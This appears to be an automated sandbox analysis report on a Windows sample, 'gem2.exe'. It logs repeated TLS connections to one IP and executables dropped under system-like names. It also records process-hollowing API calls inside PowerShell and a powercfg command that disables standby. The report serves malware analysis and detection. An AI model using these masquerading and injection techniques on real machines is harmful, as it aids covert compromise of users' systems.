Source: unknownNetwork traffic detected: HTTP traffic on port 50342 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50604 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50468 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50298 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50573 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50153
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50395
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50273
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50397
Source: unknownNetwork traffic detected: HTTP traffic on port 50596 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50275
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50157
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50158
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50281
Source: unknownNetwork traffic detected: HTTP traffic on port 50435 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50280
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50283
Source: unknownNetwork traffic detected: HTTP traffic on port 50412 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50307 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50364 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50446 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50528 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50164
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50285
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50287
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50167
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
Source: unknownNetwork traffic detected: HTTP traffic on port 50375 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50169
Source: unknownNetwork traffic detected: HTTP traffic on port 50539 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50457 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50292
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:49727 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:49814 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:49828 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:49836 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:49842 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.7:49847 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:49850 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:49870 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:49887 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:49899 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:49926 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:49936 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:49957 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:49977 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:49994 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50010 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50030 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50046 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50066 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50083 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50099 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50120 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50136 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50157 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50174 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50194 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50212 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50223 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50234 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50245 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50256 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50267 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50280 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50291 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50302 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50313 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50324 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50335 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50346 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50357 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50368 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50379 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50390 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50401 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50412 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50423 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50434 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50445 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50456 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50467 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50478 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50489 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50500 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50512 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50523 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50534 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50547 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50554 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50573 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50574 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50596 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50595 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50614 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50621 version: TLS 1.2
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D0162B80 CryptAcquireContextW,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,16_2_00000173D0162B80

System Summary

barindex
Uses powercfg.exe to modify the power settings
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\powercfg.exe powercfg -change standby-timeout-ac 0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173CFC3B7E0 NtFlushProcessWriteBuffers,16_2_00000173CFC3B7E0
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D16320A0 shared_ptr,GetModuleHandleW,shared_ptr,GetProcAddress,shared_ptr,GetProcAddress,shared_ptr,GetProcAddress,shared_ptr,GetProcAddress,GetCurrentProcessId,OpenProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,GetWindowsDirectoryW,GetModuleFileNameW,ReadProcessMemory,ReadProcessMemory,CloseHandle,17_2_00007FF7D16320A0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00007FFAAC86DF98 NtUnmapViewOfSection,31_2_00007FFAAC86DF98
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00007FFAAC870F20 NtSetContextThread,31_2_00007FFAAC870F20
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00007FFAAC870C5D NtWriteVirtualMemory,31_2_00007FFAAC870C5D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00007FFAAC870FE4 NtResumeThread,31_2_00007FFAAC870FE4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00007FFAAC870A3E NtUnmapViewOfSection,31_2_00007FFAAC870A3E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00007FFAAC86E078 NtUnmapViewOfSection,31_2_00007FFAAC86E078
Source: C:\Users\user\Desktop\gem2.exeFile created: C:\Windows\System32\System-f4855f59e0.exeJump to behavior
Source: C:\Users\user\Desktop\gem2.exeFile created: C:\Windows\SysWOW64\$LMX-f4855f59e0.exeJump to behavior
Source: C:\Windows\System32\ReAgentc.exeFile created: C:\Windows\Logs\ReAgentJump to behavior
Source: C:\Windows\System32\ReAgentc.exeFile created: C:\Windows\Logs\ReAgent\ReAgent.logJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_bo4wcxbo.2zy.ps1Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 9_3_000001F5A965CC809_3_000001F5A965CC80
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 9_3_000001F5A96634489_3_000001F5A9663448
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 9_3_000001F5A96521DC9_3_000001F5A96521DC
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 9_2_000001F5A968D8809_2_000001F5A968D880
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 9_2_000001F5A96940489_2_000001F5A9694048
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 9_2_000001F5A9682DDC9_2_000001F5A9682DDC
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54BA6B414_2_00007FF6A54BA6B4
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54E472414_2_00007FF6A54E4724
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54DA6D414_2_00007FF6A54DA6D4
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54F559814_2_00007FF6A54F5598
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54BE55014_2_00007FF6A54BE550
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54DB55C14_2_00007FF6A54DB55C
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54FB84814_2_00007FF6A54FB848
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54BE84414_2_00007FF6A54BE844
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54E492814_2_00007FF6A54E4928
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54C28E014_2_00007FF6A54C28E0
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54C074414_2_00007FF6A54C0744
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54A676014_2_00007FF6A54A6760
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54D975C14_2_00007FF6A54D975C
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54BE28814_2_00007FF6A54BE288
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A550330814_2_00007FF6A5503308
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54EF2C814_2_00007FF6A54EF2C8
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54B717C14_2_00007FF6A54B717C
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54E452014_2_00007FF6A54E4520
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54B537814_2_00007FF6A54B5378
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54E542014_2_00007FF6A54E5420
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54E73BC14_2_00007FF6A54E73BC
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54CAE8414_2_00007FF6A54CAE84
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54C1E6C14_2_00007FF6A54C1E6C
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54F6F1014_2_00007FF6A54F6F10
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54FCBD814_2_00007FF6A54FCBD8
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A5500EC014_2_00007FF6A5500EC0
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54E5EEC14_2_00007FF6A54E5EEC
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54D7D9814_2_00007FF6A54D7D98
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54C8E1014_2_00007FF6A54C8E10
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54FAE2814_2_00007FF6A54FAE28
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54E6DD014_2_00007FF6A54E6DD0
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54E508814_2_00007FF6A54E5088
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54B907714_2_00007FF6A54B9077
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54FB0A414_2_00007FF6A54FB0A4
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54FF07014_2_00007FF6A54FF070
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54E906414_2_00007FF6A54E9064
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54F510414_2_00007FF6A54F5104
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54A612014_2_00007FF6A54A6120
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54CD0DC14_2_00007FF6A54CD0DC
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54EAF9014_2_00007FF6A54EAF90
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54BF01C14_2_00007FF6A54BF01C
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54D8FC714_2_00007FF6A54D8FC7
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54EEA8C14_2_00007FF6A54EEA8C
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54F7A8814_2_00007FF6A54F7A88
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54E5AB414_2_00007FF6A54E5AB4
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54EDA5014_2_00007FF6A54EDA50
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54CFAF814_2_00007FF6A54CFAF8
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54CBB2814_2_00007FF6A54CBB28
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54D498814_2_00007FF6A54D4988
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54CC9A814_2_00007FF6A54CC9A8
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54F196814_2_00007FF6A54F1968
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54CED1814_2_00007FF6A54CED18
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54B5CEC14_2_00007FF6A54B5CEC
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54D3CDC14_2_00007FF6A54D3CDC
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54F0BAC14_2_00007FF6A54F0BAC
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54FDB6014_2_00007FF6A54FDB60
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54E8B5814_2_00007FF6A54E8B58
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54D2BFC14_2_00007FF6A54D2BFC
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54C7C3014_2_00007FF6A54C7C30
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54F5C1814_2_00007FF6A54F5C18
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54FCBD814_2_00007FF6A54FCBD8
Source: C:\Windows\System32\svchost.exeCode function: 16_3_00000173D039344816_3_00000173D0393448
Source: C:\Windows\System32\svchost.exeCode function: 16_3_00000173D038CC8016_3_00000173D038CC80
Source: C:\Windows\System32\svchost.exeCode function: 16_3_00000173D03821DC16_3_00000173D03821DC
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173CFC0F8D016_2_00000173CFC0F8D0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173CFC336D016_2_00000173CFC336D0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173CFC23E7016_2_00000173CFC23E70
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173CFC262FC16_2_00000173CFC262FC
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173CFC1A2B016_2_00000173CFC1A2B0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173CFC23A6016_2_00000173CFC23A60
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173CFC3EE7616_2_00000173CFC3EE76
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173CFC25A2816_2_00000173CFC25A28
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173CFC3EE7616_2_00000173CFC3EE76
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173CFC201E016_2_00000173CFC201E0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173CFC3EE7616_2_00000173CFC3EE76
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173CFC2187416_2_00000173CFC21874
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173CFC0E83016_2_00000173CFC0E830
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173CFC3EE7616_2_00000173CFC3EE76
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173CFC3A7A816_2_00000173CFC3A7A8
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173CFC0D7C016_2_00000173CFC0D7C0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173CFC0C77016_2_00000173CFC0C770
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173CFC31F8016_2_00000173CFC31F80
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173CFC1875016_2_00000173CFC18750
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173CFC3AEB016_2_00000173CFC3AEB0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173CFC386B816_2_00000173CFC386B8
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173CFC3EE7616_2_00000173CFC3EE76
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173CFC3EE7616_2_00000173CFC3EE76
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173CFC2365016_2_00000173CFC23650
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173CFC1D5A016_2_00000173CFC1D5A0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173CFC1F5A016_2_00000173CFC1F5A0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173CFC1ED7016_2_00000173CFC1ED70
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173CFC3EE7616_2_00000173CFC3EE76
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173CFC3EE7616_2_00000173CFC3EE76
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173CFC1C41016_2_00000173CFC1C410
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173CFC18BD016_2_00000173CFC18BD0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173CFC1B36016_2_00000173CFC1B360
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173CFC24B6016_2_00000173CFC24B60
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173CFC3938C16_2_00000173CFC3938C
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D01B04A616_2_00000173D01B04A6
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D01749E016_2_00000173D01749E0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D01A6B5016_2_00000173D01A6B50
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D019FE3016_2_00000173D019FE30
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D019A3A016_2_00000173D019A3A0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D018A4A416_2_00000173D018A4A4
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D01A74F016_2_00000173D01A74F0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D018B4E016_2_00000173D018B4E0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D018F50016_2_00000173D018F500
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D01A867016_2_00000173D01A8670
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D01816F016_2_00000173D01816F0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D018C7B016_2_00000173D018C7B0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D018AA5216_2_00000173D018AA52
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D017BA4016_2_00000173D017BA40
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D01A2B6016_2_00000173D01A2B60
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D0162B8016_2_00000173D0162B80
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D0161C3016_2_00000173D0161C30
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D0163D5016_2_00000173D0163D50
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D01A3D8016_2_00000173D01A3D80
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D019CDD016_2_00000173D019CDD0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D018BE3016_2_00000173D018BE30
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D01ACEC016_2_00000173D01ACEC0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D016EFC016_2_00000173D016EFC0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D0163FE016_2_00000173D0163FE0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D01A00D016_2_00000173D01A00D0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D015F0C016_2_00000173D015F0C0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D03C404816_2_00000173D03C4048
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D03BD88016_2_00000173D03BD880
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D03B2DDC16_2_00000173D03B2DDC
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D164E28817_2_00007FF7D164E288
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D169330817_2_00007FF7D1693308
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D167F2C817_2_00007FF7D167F2C8
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D164717C17_2_00007FF7D164717C
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D163612017_2_00007FF7D1636120
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D167542017_2_00007FF7D1675420
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D164537817_2_00007FF7D1645378
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D16773BC17_2_00007FF7D16773BC
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D166A6D417_2_00007FF7D166A6D4
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D164A6B417_2_00007FF7D164A6B4
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D166B55C17_2_00007FF7D166B55C
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D164E55017_2_00007FF7D164E550
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D167452017_2_00007FF7D1674520
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D168559817_2_00007FF7D1685598
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D168B84817_2_00007FF7D168B848
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D164E84417_2_00007FF7D164E844
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D16528E017_2_00007FF7D16528E0
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D166975C17_2_00007FF7D166975C
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D163676017_2_00007FF7D1636760
